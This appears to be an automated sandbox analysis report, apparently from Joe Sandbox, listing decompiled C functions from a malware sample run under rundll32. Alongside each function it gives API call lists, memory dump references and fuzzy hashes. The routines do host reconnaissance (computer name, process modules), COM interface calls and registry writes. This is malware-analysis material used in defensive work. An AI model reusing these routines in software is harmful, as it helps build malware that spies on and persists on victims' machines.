                          			E01002575(void* _a4, intOrPtr _a8, intOrPtr _a12) {
                          				int _v12;
                          				signed int _v16;
                          				void* _v20;
                          				signed char _v36;
                          				void* _t24;
                          				intOrPtr _t27;
                          				void* _t35;
                          				signed int _t38;
                          				signed char* _t46;
                          				int _t53;
                          				void* _t55;
                          				void* _t56;
                          				void* _t57;
                          
                          				_v16 = _v16 & 0x00000000;
                          				_t46 = _a4;
                          				_t53 = ( *_t46 & 0x000000ff) + 0x110;
                          				_v12 = 0x110;
                          				_t24 = E01006D63(_t53);
                          				_a4 = _t24;
                          				if(_t24 != 0) {
                          					memcpy(_t24,  *0x100a378, 0x110);
                          					_t27 =  *0x100a37c; // 0x0
                          					_t57 = _t56 + 0xc;
                          					if(_t27 != 0) {
                          						_t51 = _a4;
                          						E0100138A(0x110, _a4, _a4, _t27, 0);
                          					}
                          					if(E01006BF2( &_v36) != 0) {
                          						_t35 = E01005FBB(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
                          						if(_t35 == 0) {
                          							_t55 = _v20;
                          							_v36 =  *_t46;
                          							_t38 = E010013C7(_t55, _a8, _t51, _t46, _a12); // executed
                          							_v16 = _t38;
                          							 *(_t55 + 4) = _v36;
                          							memset(_t55, 0, _v12 - (_t46[4] & 0xf));
                          							_t57 = _t57 + 0xc;
                          							E01006C2C(_t55);
                          						}
                          					}
                          					memset(_a4, 0, _t53);
                          					E01006C2C(_a4);
                          				}
                          				return _v16;
                          			}

                          APIs
                            • Part of subcall function 01006D63: RtlAllocateHeap.NTDLL(00000000,00000000,01005D7B), ref: 01006D6F
                          • memcpy.NTDLL(00000000,00000110,?,?,?,?,?,?,?,01004493,?), ref: 010025AB
                          • memset.NTDLL ref: 01002621
                          • memset.NTDLL ref: 01002635
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: memset$AllocateHeapmemcpy
                          • String ID:
                          • API String ID: 1529149438-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.506070289.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_d20000_rundll32.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID: X
                          • API String ID: 544645111-3081909835
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B671B4: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,05B8A170,00000000,05B75D81,?,05B6F2F7,?), ref: 05B671D3
                            • Part of subcall function 05B671B4: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,05B8A170,00000000,05B75D81,?,05B6F2F7,?), ref: 05B671DE
                            • Part of subcall function 05B671B4: _wcsupr.NTDLL ref: 05B671EB
                            • Part of subcall function 05B671B4: lstrlenW.KERNEL32(00000000), ref: 05B671F3
                          • ResumeThread.KERNEL32(00000004,?,05B6F2F7,?), ref: 05B75D8F
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
                          • String ID: v
                          • API String ID: 3646851950-1801730948
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 38%
                          			E01001F7A(intOrPtr _a4) {
                          				void* _v12;
                          				char _v16;
                          				void* _v20;
                          				void* _v24;
                          				void* _v28;
                          				char _v32;
                          				intOrPtr _v40;
                          				void* _v46;
                          				short _v48;
                          				intOrPtr _t49;
                          				void* _t51;
                          				intOrPtr* _t53;
                          				intOrPtr _t56;
                          				void* _t58;
                          				intOrPtr* _t59;
                          				intOrPtr* _t61;
                          				intOrPtr* _t63;
                          				intOrPtr* _t65;
                          				intOrPtr* _t67;
                          				intOrPtr* _t69;
                          				intOrPtr* _t71;
                          				short _t73;
                          				intOrPtr* _t74;
                          				intOrPtr _t77;
                          				intOrPtr* _t80;
                          				intOrPtr _t82;
                          				char* _t98;
                          				intOrPtr _t100;
                          				void* _t106;
                          				void* _t108;
                          				intOrPtr _t112;
                          
                          				_v48 = 0;
                          				asm("stosd");
                          				asm("stosd");
                          				asm("stosd");
                          				asm("stosw");
                          				_t49 =  *0x100a348; // 0x428d5a8
                          				_t4 = _t49 + 0x100b448; // 0x52989f0
                          				_t82 = 0;
                          				_t5 = _t49 + 0x100b438; // 0x9ba05972
                          				_t51 =  *0x100a170(_t5, 0, 4, _t4,  &_v20); // executed
                          				_t106 = _t51;
                          				if(_t106 >= 0) {
                          					_t53 = _v20;
                          					_push( &_v12);
                          					_push(1);
                          					_push( &_v32);
                          					_push(8);
                          					_t98 =  &_v48;
                          					_push(_t98);
                          					_push(_t98);
                          					_push(_t53); // executed
                          					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
                          						_t56 =  *0x100a348; // 0x428d5a8
                          						_t30 = _t56 + 0x100b428; // 0x52989d0
                          						_t31 = _t56 + 0x100b458; // 0x4c96be40
                          						_t58 =  *0x100a10c(_v12, _t31, _t30,  &_v24); // executed
                          						_t106 = _t58;
                          						_t59 = _v12;
                          						 *((intOrPtr*)( *_t59 + 8))(_t59);
                          						goto L11;
                          					} else {
                          						_t71 = _v20;
                          						_v16 = 0;
                          						_t106 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
                          						if(_t106 >= 0) {
                          							_t112 = _v16;
                          							if(_t112 == 0) {
                          								_t106 = 0x80004005;
                          								goto L11;
                          							} else {
                          								if(_t112 <= 0) {
                          									L11:
                          									if(_t106 >= 0) {
                          										goto L12;
                          									}
                          								} else {
                          									do {
                          										_t73 = 3;
                          										_v48 = _t73;
                          										_t74 = _v20;
                          										_v40 = _t82;
                          										_t108 = _t108 - 0x10;
                          										asm("movsd");
                          										asm("movsd");
                          										asm("movsd");
                          										asm("movsd");
                          										_t106 =  *((intOrPtr*)( *_t74 + 0x20))(_t74,  &_v12);
                          										if(_t106 < 0) {
                          											goto L7;
                          										} else {
                          											_t77 =  *0x100a348; // 0x428d5a8
                          											_t23 = _t77 + 0x100b428; // 0x52989d0
                          											_t24 = _t77 + 0x100b458; // 0x4c96be40
                          											_t106 =  *0x100a10c(_v12, _t24, _t23,  &_v24);
                          											_t80 = _v12;
                          											 *((intOrPtr*)( *_t80 + 8))(_t80);
                          											if(_t106 >= 0) {
                          												L12:
                          												_t63 = _v24;
                          												_t106 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
                          												if(_t106 >= 0) {
                          													_t100 =  *0x100a348; // 0x428d5a8
                          													_t67 = _v28;
                          													_t40 = _t100 + 0x100b418; // 0x214e3
                          													_t106 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
                          													_t69 = _v28;
                          													 *((intOrPtr*)( *_t69 + 8))(_t69);
                          												}
                          												_t65 = _v24;
                          												 *((intOrPtr*)( *_t65 + 8))(_t65);
                          											} else {
                          												goto L7;
                          											}
                          										}
                          										goto L15;
                          										L7:
                          										_t82 = _t82 + 1;
                          									} while (_t82 < _v16);
                          									goto L11;
                          								}
                          							}
                          						}
                          					}
                          					L15:
                          					_t61 = _v20;
                          					 *((intOrPtr*)( *_t61 + 8))(_t61);
                          				}
                          				return _t106;
                          			}

                          APIs
                          • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,052989D0,01003F35,?,?,?,?,?,?,?,?,?,?,?,01003F35), ref: 01002047
                          • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,052989D0,01003F35,?,?,?,?,?,?,?,01003F35,00000000,00000000,00000000,006D0063), ref: 01002085
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: QueryServiceUnknown_
                          • String ID:
                          • API String ID: 2042360610-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 75%
                          			E010046CB(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                          				void* _v8;
                          				void* __esi;
                          				intOrPtr* _t35;
                          				void* _t40;
                          				intOrPtr* _t41;
                          				intOrPtr* _t43;
                          				intOrPtr* _t45;
                          				intOrPtr* _t50;
                          				intOrPtr* _t52;
                          				void* _t54;
                          				intOrPtr* _t55;
                          				intOrPtr* _t57;
                          				intOrPtr* _t61;
                          				intOrPtr* _t65;
                          				intOrPtr _t68;
                          				void* _t72;
                          				void* _t75;
                          				void* _t76;
                          
                          				_t55 = _a4;
                          				_t35 =  *((intOrPtr*)(_t55 + 4));
                          				_a4 = 0;
                          				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                          				if(_t76 < 0) {
                          					L18:
                          					return _t76;
                          				}
                          				_t40 = E010074FE(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                          				_t76 = _t40;
                          				if(_t76 >= 0) {
                          					_t61 = _a28;
                          					if(_t61 != 0 &&  *_t61 != 0) {
                          						_t52 = _v8;
                          						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                          					}
                          					if(_t76 >= 0) {
                          						_t43 =  *_t55;
                          						_t68 =  *0x100a348; // 0x428d5a8
                          						_t20 = _t68 + 0x100b1fc; // 0x740053
                          						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                          						if(_t76 >= 0) {
                          							_t76 = E010065D1(_a4);
                          							if(_t76 >= 0) {
                          								_t65 = _a28;
                          								if(_t65 != 0 &&  *_t65 == 0) {
                          									_t50 = _a4;
                          									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                          								}
                          							}
                          						}
                          						_t45 = _a4;
                          						if(_t45 != 0) {
                          							 *((intOrPtr*)( *_t45 + 8))(_t45);
                          						}
                          						_t57 = __imp__#6;
                          						if(_a20 != 0) {
                          							 *_t57(_a20);
                          						}
                          						if(_a12 != 0) {
                          							 *_t57(_a12);
                          						}
                          					}
                          				}
                          				_t41 = _v8;
                          				 *((intOrPtr*)( *_t41 + 8))(_t41);
                          				goto L18;
                          			}

                          APIs
                            • Part of subcall function 010074FE: SysAllocString.OLEAUT32(80000002), ref: 0100755B
                            • Part of subcall function 010074FE: SysFreeString.OLEAUT32(00000000), ref: 010075C1
                          • SysFreeString.OLEAUT32(?), ref: 010047AA
                          • SysFreeString.OLEAUT32(01003520), ref: 010047B4
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: String$Free$Alloc
                          • String ID:
                          • API String ID: 986138563-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 50%
                          			E01005634(intOrPtr* __eax, intOrPtr _a4) {
                          				void* _v8;
                          				void* _v12;
                          				void* _v16;
                          				intOrPtr* _t22;
                          				void* _t23;
                          				intOrPtr* _t24;
                          				intOrPtr* _t26;
                          				intOrPtr* _t28;
                          				intOrPtr* _t30;
                          				void* _t31;
                          				intOrPtr* _t32;
                          				intOrPtr _t42;
                          				intOrPtr _t45;
                          				intOrPtr _t48;
                          				void* _t51;
                          
                          				_push( &_v16);
                          				_t42 =  *0x100a348; // 0x428d5a8
                          				_t2 = _t42 + 0x100b468; // 0x20400
                          				_push(0);
                          				_push(__eax);
                          				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
                          				if(_t51 >= 0) {
                          					_t22 = _v16;
                          					_t45 =  *0x100a348; // 0x428d5a8
                          					_t6 = _t45 + 0x100b488; // 0xe7a1af80
                          					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
                          					_t51 = _t23;
                          					if(_t51 >= 0) {
                          						_t26 = _v12;
                          						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
                          						if(_t51 >= 0) {
                          							_t48 =  *0x100a348; // 0x428d5a8
                          							_t30 = _v8;
                          							_t12 = _t48 + 0x100b478; // 0xa4c6892c
                          							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
                          							_t51 = _t31;
                          							_t32 = _v8;
                          							 *((intOrPtr*)( *_t32 + 8))(_t32);
                          						}
                          						_t28 = _v12;
                          						 *((intOrPtr*)( *_t28 + 8))(_t28);
                          					}
                          					_t24 = _v16;
                          					 *((intOrPtr*)( *_t24 + 8))(_t24);
                          				}
                          				return _t51;
                          			}

                          APIs
                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 01005671
                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 010056A2
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Interface_ProxyQueryUnknown_
                          • String ID:
                          • API String ID: 2522245112-0
                          • Opcode ID: 7c3f5cb3eafbc20e6c26cca6cd82badac0e1fdb0ddfe4136eb66231e93765856
                          • Instruction ID: aeb18488df6b32962e5210eacf49980b8714aa31a7f4262ebcb0b44d1f059b11
                          • Opcode Fuzzy Hash: 7c3f5cb3eafbc20e6c26cca6cd82badac0e1fdb0ddfe4136eb66231e93765856
                          • Instruction Fuzzy Hash: 6D216075A00609EFCB01CFA4C848D9AB779EF89704B108694F941DB314DB31EE41CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000,00000000,00000104,00000000,?), ref: 05B73253
                          • GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,00000000,00000104,00000000), ref: 05B7329A
                            • Part of subcall function 05B7E803: RtlFreeHeap.NTDLL(00000000,?,05B73953,?,?,05B7BF5B,00000000,00000000,05B610B0,00000000,05B89F2C,00000008,00000003), ref: 05B7E80F
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
                          • String ID:
                          • API String ID: 552344955-0
                          • Opcode ID: 74a2fc525daf4e7e55f87bf546fd48349d9f8d53e05ddeec4cf205c724fadd53
                          • Instruction ID: 4c2ff7282ab99b0cf8f16e5c3776fc560d0802820e762272d086636ab22dd4db
                          • Opcode Fuzzy Hash: 74a2fc525daf4e7e55f87bf546fd48349d9f8d53e05ddeec4cf205c724fadd53
                          • Instruction Fuzzy Hash: 78116571A0020CBBDB11DFA9C858BAEBBF9FF85650F2044D9E92197240EB74EA05DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,05B702F2,69B25F44,?,?,00000000), ref: 05B793AD
                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,05B702F2), ref: 05B7940E
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$FileFreeHeapSystem
                          • String ID:
                          • API String ID: 892271797-0
                          • Opcode ID: 1fb9fb6ad4e6f16b1131e20a59945ab574b459a4694db75dd1f0f40231956555
                          • Instruction ID: 258a36a8114813a1c78ac61867d20f534714cc6c44689112bd8ccca9b6e20af2
                          • Opcode Fuzzy Hash: 1fb9fb6ad4e6f16b1131e20a59945ab574b459a4694db75dd1f0f40231956555
                          • Instruction Fuzzy Hash: 12110AB591410CFBCB10EBA4D949AAEBBFDEB08615F1000A2A511E7180DB74BB44EBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 01001267
                            • Part of subcall function 010046CB: SysFreeString.OLEAUT32(?), ref: 010047AA
                          • SafeArrayDestroy.OLEAUT32(?), ref: 010012B7
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: ArraySafe$CreateDestroyFreeString
                          • String ID:
                          • API String ID: 3098518882-0
                          • Opcode ID: 38b9de722de5586eaacefe4303cee9b11d654161b15de265073ecc38b2c4312c
                          • Instruction ID: 42bbf9f71cd5375b02e6cbef58b5152fe1019d16c72d4b44024b9ce2b7e26d6b
                          • Opcode Fuzzy Hash: 38b9de722de5586eaacefe4303cee9b11d654161b15de265073ecc38b2c4312c
                          • Instruction Fuzzy Hash: 1E115275A0020ABFDB02DFE8CC049EEB7B9EF08710F008025FA44E7161E7759A558B91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E010041FA(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                          				struct _FILETIME _v12;
                          				signed int _t11;
                          				void* _t16;
                          				short _t19;
                          				void* _t21;
                          				void* _t22;
                          				void* _t24;
                          				void* _t25;
                          				short* _t26;
                          
                          				_t24 = __edx;
                          				_t25 = E010061FC(_t11, _a12);
                          				if(_t25 == 0) {
                          					_t22 = 8;
                          				} else {
                          					_t26 = _t25 + _a16 * 2;
                          					 *_t26 = 0; // executed
                          					_t16 = E01002AE4(__ecx, _a4, _a8, _t25); // executed
                          					_t22 = _t16;
                          					if(_t22 == 0) {
                          						GetSystemTimeAsFileTime( &_v12);
                          						_t19 = 0x5f;
                          						 *_t26 = _t19;
                          						_t21 = E01004822(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8); // executed
                          						_t22 = _t21;
                          					}
                          					HeapFree( *0x100a2d8, 0, _t25);
                          				}
                          				return _t22;
                          			}

                          APIs
                            • Part of subcall function 010061FC: lstrlen.KERNEL32(?,00000000,05299D70,00000000,010039E8,05299F93,69B25F44,?,?,?,?,69B25F44,00000005,0100A00C,4D283A53,?), ref: 01006203
                            • Part of subcall function 010061FC: mbstowcs.NTDLL ref: 0100622C
                            • Part of subcall function 010061FC: memset.NTDLL ref: 0100623E
                          • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,76C85520,00000008,00000014,004F0053,052993F4), ref: 01004232
                          • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,76C85520,00000008,00000014,004F0053,052993F4), ref: 01004260
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                          • String ID:
                          • API String ID: 1500278894-0
                          • Opcode ID: 1bc67bf166fb0109380b16f816eefd5e66f453545e283967bd2073e5bb688b51
                          • Instruction ID: 6a7686ffbbda628daa52b550cdc0567d691aa471c0fc0e88d7eeeeabcb73fb12
                          • Opcode Fuzzy Hash: 1bc67bf166fb0109380b16f816eefd5e66f453545e283967bd2073e5bb688b51
                          • Instruction Fuzzy Hash: 9901713120024ABBEB225F989C44E9F3BB9FF85714F400425FA84DA1A1DA72D954D754
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SysAllocString.OLEAUT32(01007283), ref: 0100150A
                            • Part of subcall function 010046CB: SysFreeString.OLEAUT32(?), ref: 010047AA
                          • SysFreeString.OLEAUT32(00000000), ref: 0100154B
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: String$Free$Alloc
                          • String ID:
                          • API String ID: 986138563-0
                          • Opcode ID: 4884c7d200eb54637bbdcbd1db1b59c26925aeaad5b8f6a737d3706476f9a4b0
                          • Instruction ID: fc2d8e4f67b7e5f3ccfbf80454b8849f452066c3dc461c5340bb34f75a4200ca
                          • Opcode Fuzzy Hash: 4884c7d200eb54637bbdcbd1db1b59c26925aeaad5b8f6a737d3706476f9a4b0
                          • Instruction Fuzzy Hash: 63014F3550110ABFDF529FA8D904DEF7BB9EF48710F044021FA49E7120E6319A15CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 37%
                          			E010022D7(void* __ecx) {
                          				signed int _v8;
                          				void* _t15;
                          				void* _t19;
                          				void* _t20;
                          				void* _t22;
                          				intOrPtr* _t23;
                          
                          				_t23 = __imp__;
                          				_t20 = 0;
                          				_v8 = _v8 & 0;
                          				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                          				_t10 = _v8;
                          				if(_v8 != 0) {
                          					_t20 = E01006D63(_t10 + 1);
                          					if(_t20 != 0) {
                          						_t15 =  *_t23(3, _t20,  &_v8); // executed
                          						if(_t15 != 0) {
                          							 *((char*)(_v8 + _t20)) = 0;
                          						} else {
                          							E01006C2C(_t20);
                          							_t20 = 0;
                          						}
                          					}
                          				}
                          				return _t20;
                          			}

                          APIs
                          • GetComputerNameExA.KERNEL32(00000003,00000000,010057B5,00000000,00000000,?,75BCC740,010057B5), ref: 010022EF
                            • Part of subcall function 01006D63: RtlAllocateHeap.NTDLL(00000000,00000000,01005D7B), ref: 01006D6F
                          • GetComputerNameExA.KERNEL32(00000003,00000000,010057B5,010057B6,?,75BCC740,010057B5), ref: 0100230C
                            • Part of subcall function 01006C2C: RtlFreeHeap.NTDLL(00000000,00000000,01005E1D,00000000,?,?,00000000), ref: 01006C38
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: ComputerHeapName$AllocateFree
                          • String ID:
                          • API String ID: 187446995-0
                          • Opcode ID: f7f733a94c520967cacd242d4486d4ff4c596e329418bc29948976e13e2fe526
                          • Instruction ID: 1755316843eba7ac1b971349ce5eb55ed14683b32bd4f204e9c5f00ce93a8a9c
                          • Opcode Fuzzy Hash: f7f733a94c520967cacd242d4486d4ff4c596e329418bc29948976e13e2fe526
                          • Instruction Fuzzy Hash: 6DF05476A0010AFAF723D6A98C04FAF7BFDDBC5650F114096E984D3181EAB5DA058771
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E010078BF(WCHAR* _a4) {
                          				void* __edi;
                          				intOrPtr _t11;
                          				intOrPtr _t14;
                          				void* _t16;
                          				void* _t18;
                          				WCHAR* _t20;
                          
                          				_t20 = E01006D63(lstrlenW(_a4) + _t7 + 0x5c);
                          				if(_t20 == 0) {
                          					_t18 = 8;
                          				} else {
                          					_t11 =  *0x100a348; // 0x428d5a8
                          					_t5 = _t11 + 0x100ba70; // 0x43002f
                          					wsprintfW(_t20, _t5, 5, _a4);
                          					_t14 =  *0x100a348; // 0x428d5a8
                          					_t6 = _t14 + 0x100b900; // 0x6d0063
                          					_t16 = E01007928(0, _t6, _t20, 0); // executed
                          					_t18 = _t16;
                          					E01006C2C(_t20);
                          				}
                          				return _t18;
                          			}

                          APIs
                          • lstrlenW.KERNEL32(76CDF710,00000000,?,010071A6,00000000,?,76CDF710,00000000,76CDF730), ref: 010078C5
                            • Part of subcall function 01006D63: RtlAllocateHeap.NTDLL(00000000,00000000,01005D7B), ref: 01006D6F
                          • wsprintfW.USER32 ref: 010078EE
                            • Part of subcall function 01007928: memset.NTDLL ref: 0100794B
                            • Part of subcall function 01007928: GetLastError.KERNEL32 ref: 01007997
                            • Part of subcall function 01006C2C: RtlFreeHeap.NTDLL(00000000,00000000,01005E1D,00000000,?,?,00000000), ref: 01006C38
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Heap$AllocateErrorFreeLastlstrlenmemsetwsprintf
                          • String ID:
                          • API String ID: 1672627171-0
                          • Opcode ID: 3a04c17faba3daa14049213ddea1e6fbda166bc875b42d86b569f3f9e27121e2
                          • Instruction ID: c4ffbc912acbfe1cdd484199376ad74b524fc17367294631b9ed02af7407686e
                          • Opcode Fuzzy Hash: 3a04c17faba3daa14049213ddea1e6fbda166bc875b42d86b569f3f9e27121e2
                          • Instruction Fuzzy Hash: D8F05932601215AFE323AB28DC08FEF37DCEF84711F058422F6C4C7191CA3AA9118760
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlEnterCriticalSection.NTDLL(05B8A400), ref: 05B7E873
